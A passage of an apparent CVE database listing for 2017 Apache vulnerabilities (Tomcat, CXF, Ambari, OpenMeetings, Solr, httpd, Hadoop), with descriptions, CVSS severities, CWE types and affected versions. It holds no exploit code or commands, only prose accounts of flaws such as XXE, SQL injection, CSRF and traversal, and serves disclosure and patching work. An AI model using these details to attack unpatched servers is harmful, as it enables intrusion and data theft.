apache tomcat 8.0.29
apache tomcat 7.0.19
apache tomcat 7.0.61
apache tomcat 8.0.39
apache tomcat 6.0.39
apache tomcat 7.0.46
apache tomcat 7.0.29
apache tomcat 8.0.9
apache tomcat 8.0.30
apache tomcat 8.0.33
apache tomcat 6.0.6
apache tomcat 8.0.26
apache tomcat 7.0.58
apache tomcat 8.0.41
apache tomcat 7.0.20
apache tomcat 6.0.21
apache tomcat 6.0.10
apache tomcat 8.5.10
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 8.0.24
apache tomcat 8.5.12
apache tomcat 8.0.1
apache tomcat 7.0.10
apache tomcat 7.0.66
apache tomcat 6.0.40
apache tomcat 7.0.26
apache tomcat 6.0.49
apache tomcat 6.0.0
apache tomcat 6.0.16
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 6.0.11
apache tomcat 8.0.38
apache tomcat 7.0.76
apache tomcat 7.0.2
apache tomcat 8.0.28
apache tomcat 6.0.19
apache tomcat 7.0.52
apache tomcat 7.0.63
apache tomcat 6.0.9
apache tomcat 8.0.2
apache tomcat 6.0.48
apache tomcat 7.0.22
apache tomcat 8.0.7
apache tomcat 8.5.3
apache tomcat 6.0.35
CVE-2017-5648 MEDIUM

While investigating bug 60718, it was noticed that some calls to application listeners in Apache Tomcat 9.0.0.M1 to 9.0.0.M17, 8.5.0 to 8.5.11, 8.0.0.RC1 to 8.0.41, and 7.0.0 to 7.0.75 did not use the appropriate facade object. When running an untrusted application under a SecurityManager, it was therefore possible for that untrusted application to retain a reference to the request or response object and thereby access and/or modify information associated with another web application.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-668,

Products Affected

Vendor Product Version
apache tomcat 8.0.20
apache tomcat 8.5.5
apache tomcat 8.0.22
apache tomcat 8.0.14
apache tomcat 7.0.44
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 8.5.2
apache tomcat 8.5.9
apache tomcat 8.0.35
apache tomcat 7.0.62
apache tomcat 7.0.33
apache tomcat 7.0.3
apache tomcat 7.0.40
apache tomcat 7.0.72
apache tomcat 9.0.0
apache tomcat 7.0.5
apache tomcat 7.0.71
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 8.0.40
apache tomcat 8.5.4
apache tomcat 7.0.36
apache tomcat 7.0.57
apache tomcat 8.5.11
apache tomcat 7.0.38
apache tomcat 8.0.17
apache tomcat 7.0.64
apache tomcat 7.0.9
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 8.0.15
apache tomcat 7.0.67
apache tomcat 8.0.16
apache tomcat 7.0.7
apache tomcat 7.0.34
apache tomcat 7.0.24
apache tomcat 8.5.7
apache tomcat 8.0.32
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.6
apache tomcat 8.0.8
apache tomcat 8.0.10
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 7.0.69
apache tomcat 7.0.73
apache tomcat 8.0.13
apache tomcat 8.0.31
apache tomcat 8.0.19
apache tomcat 7.0.53
apache tomcat 7.0.51
apache tomcat 7.0.30
apache tomcat 8.0.18
apache tomcat 7.0.47
apache tomcat 8.0.27
apache tomcat 8.5.1
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 8.0.6
apache tomcat 8.0.25
apache tomcat 8.0.36
apache tomcat 7.0.56
apache tomcat 7.0.68
apache tomcat 8.0.4
apache tomcat 7.0.12
apache tomcat 8.0.37
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 7.0.60
apache tomcat 7.0.28
apache tomcat 8.5.6
apache tomcat 7.0.21
apache tomcat 7.0.31
apache tomcat 8.0.23
apache tomcat 8.0.5
apache tomcat 8.5.8
apache tomcat 7.0.17
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.75
apache tomcat 8.5.0
apache tomcat 7.0.70
apache tomcat 8.0.34
apache tomcat 7.0.25
apache tomcat 8.0.21
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 7.0.74
apache tomcat 7.0.35
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
apache tomcat 7.0.61
apache tomcat 8.0.39
apache tomcat 7.0.46
apache tomcat 7.0.29
apache tomcat 8.0.9
apache tomcat 8.0.30
apache tomcat 8.0.33
apache tomcat 8.0.26
apache tomcat 7.0.58
apache tomcat 8.0.41
apache tomcat 7.0.20
apache tomcat 8.5.10
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 8.0.24
apache tomcat 8.0.1
apache tomcat 7.0.10
apache tomcat 7.0.66
apache tomcat 7.0.26
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 8.0.38
apache tomcat 7.0.2
apache tomcat 8.0.28
apache tomcat 7.0.52
apache tomcat 7.0.63
apache tomcat 8.0.2
apache tomcat 7.0.22
apache tomcat 8.0.7
apache tomcat 8.5.3
CVE-2017-5649 MEDIUM

Apache Geode before 1.1.1, when a cluster has enabled security by setting the security-manager property, allows remote authenticated users with CLUSTER:READ but not DATA:READ permission to access the data browser page in Pulse and consequently execute an OQL query that exposes data stored in the cluster.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache geode *
CVE-2017-5650 MEDIUM

In Apache Tomcat 9.0.0.M1 to 9.0.0.M18 and 8.5.0 to 8.5.12, the handling of an HTTP/2 GOAWAY frame for a connection did not close streams associated with that connection that were currently waiting for a WINDOW_UPDATE before allowing the application to write more data. These waiting streams each consumed a thread. A malicious client could therefore construct a series of HTTP/2 requests that would consume all available processing threads.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-404,

Products Affected

Vendor Product Version
apache tomcat 8.5.2
apache tomcat 8.5.9
apache tomcat 8.5.4
apache tomcat 8.5.10
apache tomcat 8.5.1
apache tomcat 8.5.6
apache tomcat 8.5.12
apache tomcat 8.5.11
apache tomcat 8.5.5
apache tomcat 8.5.8
apache tomcat 9.0.0
apache tomcat 8.5.0
apache tomcat 8.5.3
apache tomcat 8.5.7
CVE-2017-5651 HIGH

In Apache Tomcat 9.0.0.M1 to 9.0.0.M18 and 8.5.0 to 8.5.12, the refactoring of the HTTP connectors introduced a regression in the send file processing. If the send file processing completed quickly, it was possible for the Processor to be added to the processor cache twice. This could result in the same Processor being used for multiple requests which in turn could lead to unexpected errors and/or response mix-up.

CVSS 2.0

Severity: HIGH

Problem Type: NVD-CWE-noinfo,

Products Affected

Vendor Product Version
apache tomcat 8.5.2
apache tomcat 8.5.9
apache tomcat 8.5.4
apache tomcat 8.5.10
apache tomcat 8.5.1
apache tomcat 8.5.6
apache tomcat 8.5.12
apache tomcat 8.5.11
apache tomcat 8.5.5
apache tomcat 8.5.8
apache tomcat 9.0.0
apache tomcat 8.5.0
apache tomcat 8.5.3
apache tomcat 8.5.7
CVE-2017-5652 MEDIUM

During a routine security analysis, it was found that one of the ports in Apache Impala (incubating) 2.7.0 to 2.8.0 sent data in plaintext even when the cluster was configured to use TLS. The port in question was used by the StatestoreSubscriber class which did not use the appropriate secure Thrift transport when TLS was turned on. It was therefore possible for an adversary, with access to the network, to eavesdrop on the packets going to and coming from that port and view the data in plaintext.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-319,

Products Affected

Vendor Product Version
apache impala 2.8.0
apache impala 2.7.0
CVE-2017-5653 MEDIUM

JAX-RS XML Security streaming clients in Apache CXF before 3.1.11 and 3.0.13 do not validate that the service response was signed or encrypted, which allows remote attackers to spoof servers.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-295,

Products Affected

Vendor Product Version
apache cxf *
CVE-2017-5654 MEDIUM

In Ambari 2.4.x (before 2.4.3) and Ambari 2.5.0, an authorized user of the Ambari Hive View may be able to gain unauthorized read access to files on the host where the Ambari server executes.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-91,

Products Affected

Vendor Product Version
apache ambari 2.4.0
apache ambari 2.4.1
apache ambari 2.5.0
CVE-2017-5655 MEDIUM

In Ambari 2.2.2 through 2.4.2 and Ambari 2.5.0, sensitive data may be stored on disk in temporary files on the Ambari Server host. The temporary files are readable by any user authenticated on the host.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache ambari 2.4.0
apache ambari 2.2.2
apache ambari 2.4.1
apache ambari 2.4.2
apache ambari 2.5.0
CVE-2017-5656 MEDIUM

Apache CXF's STSClient before 3.1.11 and 3.0.13 uses a flawed way of caching tokens that are associated with delegation tokens, which means that an attacker could craft a token which would return an identifer corresponding to a cached token for another user.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-384,

Products Affected

Vendor Product Version
apache cxf *
CVE-2017-5657 MEDIUM

Several REST service endpoints of Apache Archiva are not protected against Cross Site Request Forgery (CSRF) attacks. A malicious site opened in the same browser as the archiva site, may send an HTML response that performs arbitrary actions on archiva services, with the same rights as the active archiva session (e.g. administrator rights).

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache archiva *
CVE-2017-5658 MEDIUM

The statistics generator in Apache Pony Mail 0.7 to 0.9 was found to be returning timestamp data without proper authorization checks. This could lead to derived information disclosure on private lists about the timing of specific email subjects or text bodies, though without disclosing the content itself. As this was primarily used as a caching feature for faster loading times, the caching was disabled by default to prevent this. Users using 0.9 should upgrade to 0.10 to address this issue.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-200,

Products Affected

Vendor Product Version
apache pony_mail *
CVE-2017-5659 MEDIUM

Apache Traffic Server before 6.2.1 generates a coredump when there is a mismatch between content length and chunked encoding.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache traffic_server *
CVE-2017-5660 MEDIUM

There is a vulnerability in Apache Traffic Server (ATS) 6.2.0 and prior and 7.0.0 and prior with the Host header and line folding. This can have issues when interacting with upstream proxies and the wrong host being used.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
debian debian_linux 9.0
apache traffic_server *
apache traffic_server 7.0.0
apache traffic_server 6.2.2
apache traffic_server 6.2.1
CVE-2017-5661 HIGH

In Apache FOP before 2.2, files lying on the filesystem of the server which uses FOP can be revealed to arbitrary users who send maliciously formed SVG files. The file types that can be shown depend on the user context in which the exploitable application is running. If the user is root a full compromise of the server - including confidential or sensitive files - would be possible. XXE can also be used to attack the availability of the server via denial of service as the references within a xml document can trivially trigger an amplification attack.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache formatting_objects_processor *
CVE-2017-5662 HIGH

In Apache Batik before 1.9, files lying on the filesystem of the server which uses batik can be revealed to arbitrary users who send maliciously formed SVG files. The file types that can be shown depend on the user context in which the exploitable application is running. If the user is root a full compromise of the server - including confidential or sensitive files - would be possible. XXE can also be used to attack the availability of the server via denial of service as the references within a xml document can trivially trigger an amplification attack.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache batik *
CVE-2017-5663 MEDIUM

In Apache Fineract 0.4.0-incubating, 0.5.0-incubating, and 0.6.0-incubating, an authenticated user with client/loan/center/staff/group read permissions is able to inject malicious SQL into SELECT queries. The 'sqlSearch' parameter on a number of endpoints is not sanitized and appended directly to the query.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-89,

Products Affected

Vendor Product Version
apache fineract 0.5.0-incubating
apache fineract 0.6.0-incubating
apache fineract 0.4.0-incubating
CVE-2017-5664 MEDIUM

The error page mechanism of the Java Servlet Specification requires that, when an error occurs and an error page is configured for the error that occurred, the original request and response are forwarded to the error page. This means that the request is presented to the error page with the original HTTP method. If the error page is a static file, expected behaviour is to serve content of the file as if processing a GET request, regardless of the actual HTTP method. The Default Servlet in Apache Tomcat 9.0.0.M1 to 9.0.0.M20, 8.5.0 to 8.5.14, 8.0.0.RC1 to 8.0.43 and 7.0.0 to 7.0.77 did not do this. Depending on the original request this could lead to unexpected and undesirable results for static error pages including, if the DefaultServlet is configured to permit writes, the replacement or removal of the custom error page. Notes for other user provided error pages: (1) Unless explicitly coded otherwise, JSPs ignore the HTTP method. JSPs used as error pages must must ensure that they handle any error dispatch as a GET request, regardless of the actual method. (2) By default, the response generated by a Servlet does depend on the HTTP method. Custom Servlets used as error pages must ensure that they handle any error dispatch as a GET request, regardless of the actual method.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-755,

Products Affected

Vendor Product Version
apache tomcat 8.0.20
apache tomcat 8.5.5
apache tomcat 8.0.22
apache tomcat 8.0.14
apache tomcat 7.0.44
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 8.0.42
apache tomcat 8.5.14
apache tomcat 8.5.2
apache tomcat 8.5.9
apache tomcat 8.0.35
apache tomcat 7.0.62
apache tomcat 7.0.33
apache tomcat 7.0.3
apache tomcat 7.0.40
apache tomcat 7.0.72
apache tomcat 9.0.0
apache tomcat 7.0.5
apache tomcat 7.0.71
apache tomcat 7.0.0
apache tomcat 7.0.32
apache tomcat 7.0.4
apache tomcat 8.0.40
apache tomcat 8.5.4
apache tomcat 7.0.77
apache tomcat 7.0.36
apache tomcat 7.0.57
apache tomcat 8.5.11
apache tomcat 7.0.38
apache tomcat 8.0.17
apache tomcat 7.0.64
apache tomcat 7.0.9
apache tomcat 7.0.43
apache tomcat 7.0.18
apache tomcat 8.0.15
apache tomcat 7.0.67
apache tomcat 8.0.16
apache tomcat 7.0.7
apache tomcat 7.0.34
apache tomcat 7.0.24
apache tomcat 8.5.7
apache tomcat 8.0.32
apache tomcat 7.0.1
apache tomcat 7.0.45
apache tomcat 7.0.6
apache tomcat 8.0.10
apache tomcat 7.0.8
apache tomcat 7.0.27
apache tomcat 7.0.69
apache tomcat 7.0.73
apache tomcat 8.0.13
apache tomcat 8.0.31
apache tomcat 8.0.19
apache tomcat 7.0.51
apache tomcat 7.0.30
apache tomcat 8.0.18
apache tomcat 7.0.47
apache tomcat 8.0.27
apache tomcat 8.5.1
apache tomcat 8.0.0
apache tomcat 7.0.13
apache tomcat 7.0.39
apache tomcat 8.0.6
apache tomcat 8.0.25
apache tomcat 8.0.36
apache tomcat 7.0.56
apache tomcat 7.0.68
apache tomcat 8.0.4
apache tomcat 7.0.12
apache tomcat 8.0.37
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 7.0.60
apache tomcat 7.0.28
apache tomcat 8.5.6
apache tomcat 7.0.21
apache tomcat 7.0.31
apache tomcat 8.0.23
apache tomcat 8.0.5
apache tomcat 8.5.8
apache tomcat 7.0.17
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 7.0.11
apache tomcat 7.0.16
apache tomcat 7.0.75
apache tomcat 8.5.0
apache tomcat 7.0.70
apache tomcat 8.0.34
apache tomcat 7.0.25
apache tomcat 8.0.43
apache tomcat 8.0.21
apache tomcat 7.0.15
apache tomcat 7.0.37
apache tomcat 7.0.48
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 7.0.74
apache tomcat 7.0.35
apache tomcat 7.0.23
apache tomcat 8.0.29
apache tomcat 7.0.19
apache tomcat 7.0.61
apache tomcat 8.0.39
apache tomcat 7.0.46
apache tomcat 7.0.29
apache tomcat 8.0.9
apache tomcat 8.0.30
apache tomcat 8.0.33
apache tomcat 8.0.26
apache tomcat 7.0.58
apache tomcat 8.0.41
apache tomcat 7.0.20
apache tomcat 8.5.10
apache tomcat 7.0.14
apache tomcat 7.0.49
apache tomcat 8.0.24
apache tomcat 8.5.12
apache tomcat 8.0.1
apache tomcat 7.0.10
apache tomcat 7.0.66
apache tomcat 7.0.26
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 8.5.13
apache tomcat 8.0.38
apache tomcat 7.0.76
apache tomcat 7.0.2
apache tomcat 8.0.28
apache tomcat 7.0.63
apache tomcat 8.0.2
apache tomcat 7.0.22
apache tomcat 8.0.7
apache tomcat 8.5.3
CVE-2017-6891 MEDIUM

Two errors in the "asn1_find_node()" function (lib/parser_aux.c) within GnuTLS libtasn1 version 4.10 can be exploited to cause a stacked-based buffer overflow by tricking a user into processing a specially crafted assignments file via the e.g. asn1Coding utility.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-787,

Products Affected

Vendor Product Version
apache bookkeeper 4.12.1
gnu libtasn1 4.10
debian debian_linux 8.0
CVE-2017-7659 MEDIUM

A maliciously constructed HTTP/2 request could cause mod_http2 in Apache HTTP Server 2.4.24, 2.4.25 to dereference a NULL pointer and crash the server process.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-476,

Products Affected

Vendor Product Version
apache http_server 2.4.25
apache http_server 2.4.24
CVE-2017-7660 MEDIUM

Apache Solr uses a PKI based mechanism to secure inter-node communication when security is enabled. It is possible to create a specially crafted node name that does not exist as part of the cluster and point it to a malicious node. This can trick the nodes in cluster to believe that the malicious node is a member of the cluster. So, if Solr users have enabled BasicAuth authentication mechanism using the BasicAuthPlugin or if the user has implemented a custom Authentication plugin, which does not implement either "HttpClientInterceptorPlugin" or "HttpClientBuilderPlugin", his/her servers are vulnerable to this attack. Users who only use SSL without basic authentication or those who use Kerberos are not affected.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-287,

Products Affected

Vendor Product Version
apache solr 5.5.2
apache solr 6.4.0
apache solr 5.5.0
apache solr 6.2.0
apache solr 6.5.1
apache solr 6.2.1
apache solr 6.4.1
apache solr 6.0.0
apache solr 5.3.2
apache solr 6.3.0
apache solr 6.5.0
apache solr 6.1.0
apache solr 5.4.1
apache solr 6.4.2
apache solr 5.3.1
apache solr 6.0.1
apache solr 5.4.0
apache solr 5.5.3
apache solr 5.3.0
apache solr 5.5.4
apache solr 5.5.1
CVE-2017-7661 MEDIUM

Apache CXF Fediz ships with a number of container-specific plugins to enable WS-Federation for applications. A CSRF (Cross Style Request Forgery) style vulnerability has been found in the Spring 2, Spring 3, Jetty 8 and Jetty 9 plugins in Apache CXF Fediz prior to 1.4.0, 1.3.2 and 1.2.4.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache cxf_fediz *
apache cxf_fediz 1.2.4
apache cxf_fediz 1.3.2
CVE-2017-7662 MEDIUM

Apache CXF Fediz ships with an OpenId Connect (OIDC) service which has a Client Registration Service, which is a simple web application that allows clients to be created, deleted, etc. A CSRF (Cross Style Request Forgery) style vulnerability has been found in this web application in Apache CXF Fediz prior to 1.4.0 and 1.3.2, meaning that a malicious web application could create new clients, or reset secrets, etc, after the admin user has logged on to the client registration service and the session is still active.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-352,

Products Affected

Vendor Product Version
apache cxf_fediz *
apache cxf_fediz 1.4.0
CVE-2017-7663 MEDIUM

Both global and Room chat are vulnerable to XSS attack in Apache OpenMeetings 3.2.0.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache openmeetings 3.2.0
apache openmeetings 3.2.1
CVE-2017-7664 HIGH

Uploaded XML documents were not correctly validated in Apache OpenMeetings 3.1.0.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-611,

Products Affected

Vendor Product Version
apache openmeetings 3.1.0
apache openmeetings 3.1.4
apache openmeetings 3.1.5
apache openmeetings 3.1.1
apache openmeetings 3.2.0
apache openmeetings 3.1.3
apache openmeetings 3.2.1
apache openmeetings 3.1.2
CVE-2017-7665 MEDIUM

In Apache NiFi before 0.7.4 and 1.x before 1.3.0, there are certain user input components in the UI which had been guarding for some forms of XSS issues but were insufficient.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,

Products Affected

Vendor Product Version
apache nifi 1.0.0
apache nifi 1.0.1
apache nifi 1.1.2
apache nifi *
apache nifi 1.2.0
apache nifi 1.1.1
apache nifi 1.1.0
CVE-2017-7666 MEDIUM

Apache OpenMeetings 1.0.0 is vulnerable to Cross-Site Request Forgery (CSRF) attacks, XSS attacks, click-jacking, and MIME based attacks.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-79,CWE-352,

Products Affected

Vendor Product Version
apache openmeetings 3.0.6
apache openmeetings 3.0.2
apache openmeetings 3.1.4
apache openmeetings 3.0.5
apache openmeetings 2.0
apache openmeetings 3.0.7
apache openmeetings 3.0.4
apache openmeetings 3.0.3
apache openmeetings 3.2.0
apache openmeetings 1.0.0
apache openmeetings 3.1.0
apache openmeetings 2.2.0
apache openmeetings 3.0.1
apache openmeetings 3.1.5
apache openmeetings 3.0.0
apache openmeetings 3.1.1
apache openmeetings 2.1
apache openmeetings 3.1.3
apache openmeetings 3.2.1
apache openmeetings 3.1.2
apache openmeetings 2.1.1
CVE-2017-7667 MEDIUM

Apache NiFi before 0.7.4 and 1.x before 1.3.0 need to establish the response header telling browsers to only allow framing with the same origin.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-346,

Products Affected

Vendor Product Version
apache nifi 1.0.0
apache nifi 1.0.1
apache nifi 1.1.2
apache nifi *
apache nifi 1.2.0
apache nifi 1.1.1
apache nifi 1.1.0
CVE-2017-7668 MEDIUM

The HTTP strict parsing changes added in Apache httpd 2.2.32 and 2.4.24 introduced a bug in token list parsing, which allows ap_find_token() to search past the end of its input string. By maliciously crafting a sequence of request headers, an attacker may be able to cause a segmentation fault, or to force ap_find_token() to return an incorrect value.

CVSS 3.x

Source Score Severity Vector Exploitability Impact
nvd@nist.gov 7.5 HIGH CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H 3.9 3.6

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-126,CWE-125,

Products Affected

Vendor Product Version
redhat enterprise_linux_server_aus 7.2
redhat enterprise_linux_server_aus 7.4
redhat enterprise_linux_server_tus 7.3
redhat enterprise_linux_server_tus 7.6
redhat enterprise_linux_eus 7.6
netapp clustered_data_ontap -
redhat enterprise_linux_eus 7.4
apple mac_os_x 10.11.6
redhat enterprise_linux_desktop 7.0
redhat enterprise_linux_server_tus 7.4
redhat enterprise_linux_server_aus 7.6
redhat enterprise_linux_workstation 7.0
redhat enterprise_linux_eus 7.2
netapp storagegrid -
oracle secure_global_desktop 5.3
redhat enterprise_linux_server_aus 7.3
redhat enterprise_linux_eus 7.7
apple mac_os_x 10.12.6
apache http_server 2.4.25
apple mac_os_x *
apache http_server 2.4.24
netapp oncommand_unified_manager -
debian debian_linux 9.0
apache http_server 2.2.32
redhat enterprise_linux_eus 7.3
redhat enterprise_linux_eus 7.5
debian debian_linux 8.0
redhat enterprise_linux_server_aus 7.7
redhat enterprise_linux_server_tus 7.7
redhat enterprise_linux_server_tus 7.2
redhat enterprise_linux_server 7.0
CVE-2017-7669 HIGH

In Apache Hadoop 2.8.0, 3.0.0-alpha1, and 3.0.0-alpha2, the LinuxContainerExecutor runs docker commands as root with insufficient input validation. When the docker feature is enabled, authenticated users can run commands as root.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache hadoop 2.8.0
apache hadoop 3.0.0
CVE-2017-7670 MEDIUM

The Traffic Router component of the incubating Apache Traffic Control project is vulnerable to a Slowloris style Denial of Service attack. TCP connections made on the configured DNS port will remain in the ESTABLISHED state until the client explicitly closes the connection or Traffic Router is restarted. If connections remain in the ESTABLISHED state indefinitely and accumulate in number to match the size of the thread pool dedicated to processing DNS requests, the thread pool becomes exhausted. Once the thread pool is exhausted, Traffic Router is unable to service any DNS request, regardless of transport protocol.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-400,

Products Affected

Vendor Product Version
apache traffic_control *
apache traffic_control 2.0.0
apache traffic_control 1.8.1
CVE-2017-7671 MEDIUM

There is a DOS attack vulnerability in Apache Traffic Server (ATS) 5.2.0 to 5.3.2, 6.0.0 to 6.2.0, and 7.0.0 with the TLS handshake. This issue can cause the server to coredump.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
debian debian_linux 9.0
apache traffic_server *
apache traffic_server 7.0.0
CVE-2017-7672 MEDIUM

If an application allows enter an URL in a form field and built-in URLValidator is used, it is possible to prepare a special URL which will be used to overload server process when performing validation of the URL. Solution is to upgrade to Apache Struts version 2.5.12.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache struts 2.5
apache struts 2.5.5
apache struts 2.5.2
apache struts 2.5.8
apache struts 2.5.10.1
apache struts 2.5.1
apache struts 2.5.10
CVE-2017-7673 MEDIUM

Apache OpenMeetings 1.0.0 uses not very strong cryptographic storage, captcha is not used in registration and forget password dialogs and auth forms missing brute force protection.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-307,CWE-326,

Products Affected

Vendor Product Version
apache openmeetings 3.0.6
apache openmeetings 3.0.2
apache openmeetings 3.1.4
apache openmeetings 3.0.5
apache openmeetings 2.0
apache openmeetings 3.0.7
apache openmeetings 3.0.4
apache openmeetings 3.0.3
apache openmeetings 3.2.0
apache openmeetings 1.0.0
apache openmeetings 3.1.0
apache openmeetings 2.2.0
apache openmeetings 3.0.1
apache openmeetings 3.1.5
apache openmeetings 3.0.0
apache openmeetings 3.1.1
apache openmeetings 2.1
apache openmeetings 3.1.3
apache openmeetings 3.2.1
apache openmeetings 3.1.2
apache openmeetings 2.1.1
CVE-2017-7674 MEDIUM

The CORS Filter in Apache Tomcat 9.0.0.M1 to 9.0.0.M21, 8.5.0 to 8.5.15, 8.0.0.RC1 to 8.0.44 and 7.0.41 to 7.0.78 did not add an HTTP Vary header indicating that the response varies depending on Origin. This permitted client and server side cache poisoning in some circumstances.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-345,

Products Affected

Vendor Product Version
apache tomcat 8.0.20
apache tomcat 8.5.5
apache tomcat 8.0.22
apache tomcat 8.0.14
apache tomcat 7.0.44
apache tomcat 8.0.3
apache tomcat 8.0.11
apache tomcat 8.0.42
apache tomcat 8.5.14
apache tomcat 8.5.2
apache tomcat 8.5.9
apache tomcat 8.0.35
apache tomcat 7.0.62
apache tomcat 7.0.72
apache tomcat 9.0.0
apache tomcat 7.0.71
apache tomcat 8.0.40
apache tomcat 8.5.4
apache tomcat 7.0.77
apache tomcat 7.0.57
apache tomcat 8.5.11
apache tomcat 8.0.17
apache tomcat 7.0.64
apache tomcat 7.0.43
apache tomcat 8.0.15
apache tomcat 7.0.67
apache tomcat 8.0.16
apache tomcat 8.5.7
apache tomcat 8.0.32
apache tomcat 8.0.44
apache tomcat 7.0.45
apache tomcat 8.0.8
apache tomcat 8.0.10
apache tomcat 7.0.69
apache tomcat 7.0.73
apache tomcat 8.0.13
apache tomcat 8.0.31
apache tomcat 8.0.19
apache tomcat 7.0.53
apache tomcat 8.0.18
apache tomcat 7.0.47
apache tomcat 8.0.27
apache tomcat 8.5.1
apache tomcat 8.0.0
apache tomcat 8.0.6
apache tomcat 8.0.25
apache tomcat 8.0.36
apache tomcat 7.0.56
apache tomcat 8.5.15
apache tomcat 7.0.68
apache tomcat 8.0.4
apache tomcat 8.0.37
apache tomcat 7.0.41
apache tomcat 7.0.50
apache tomcat 7.0.60
apache tomcat 8.5.6
apache tomcat 8.0.23
apache tomcat 8.0.5
apache tomcat 8.5.8
apache tomcat 7.0.59
apache tomcat 7.0.65
apache tomcat 7.0.75
apache tomcat 8.5.0
apache tomcat 7.0.70
apache tomcat 8.0.34
apache tomcat 8.0.43
apache tomcat 8.0.21
apache tomcat 7.0.48
apache tomcat 7.0.54
apache tomcat 7.0.42
apache tomcat 7.0.74
apache tomcat 8.0.29
apache tomcat 7.0.61
apache tomcat 8.0.39
apache tomcat 7.0.46
apache tomcat 8.0
apache tomcat 8.0.9
apache tomcat 8.0.30
apache tomcat 8.0.33
apache tomcat 8.0.26
apache tomcat 7.0.58
apache tomcat 8.0.41
apache tomcat 8.5.10
apache tomcat 7.0.49
apache tomcat 8.0.24
apache tomcat 8.5.12
apache tomcat 8.0.1
apache tomcat 7.0.66
apache tomcat 8.0.12
apache tomcat 7.0.55
apache tomcat 8.5.13
apache tomcat 7.0.78
apache tomcat 8.0.38
apache tomcat 7.0.76
apache tomcat 8.0.28
apache tomcat 7.0.52
apache tomcat 7.0.63
apache tomcat 8.0.2
apache tomcat 8.0.7
apache tomcat 8.5.3
CVE-2017-7675 MEDIUM

The HTTP/2 implementation in Apache Tomcat 9.0.0.M1 to 9.0.0.M21 and 8.5.0 to 8.5.15 bypassed a number of security checks that prevented directory traversal attacks. It was therefore possible to bypass security constraints using a specially crafted URL.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-22,

Products Affected

Vendor Product Version
apache tomcat 8.5.2
apache tomcat 8.5.9
apache tomcat 8.5.4
apache tomcat 8.5.10
apache tomcat 8.5.1
apache tomcat 8.5.6
apache tomcat 8.5.12
apache tomcat 8.5.11
apache tomcat 8.5.5
apache tomcat 8.5.15
apache tomcat 8.5.8
apache tomcat 8.5.13
apache tomcat 9.0.0
apache tomcat 8.5.0
apache tomcat 8.5.3
apache tomcat 8.5.7
apache tomcat 8.5.14
CVE-2017-7676 HIGH

Policy resource matcher in Apache Ranger before 0.7.1 ignores characters after '*' wildcard character - like my*test, test*.txt. This can result in unintended behavior.

CVSS 2.0

Severity: HIGH

Problem Type: CWE-20,

Products Affected

Vendor Product Version
apache ranger *
CVE-2017-7677 MEDIUM

In environments that use external location for hive tables, Hive Authorizer in Apache Ranger before 0.7.1 should be checking RWX permission for create table.

CVSS 2.0

Severity: MEDIUM

Problem Type: CWE-862,

Products Affected

Vendor Product Version
apache ranger *
CVE-2017-7678 MEDIUM

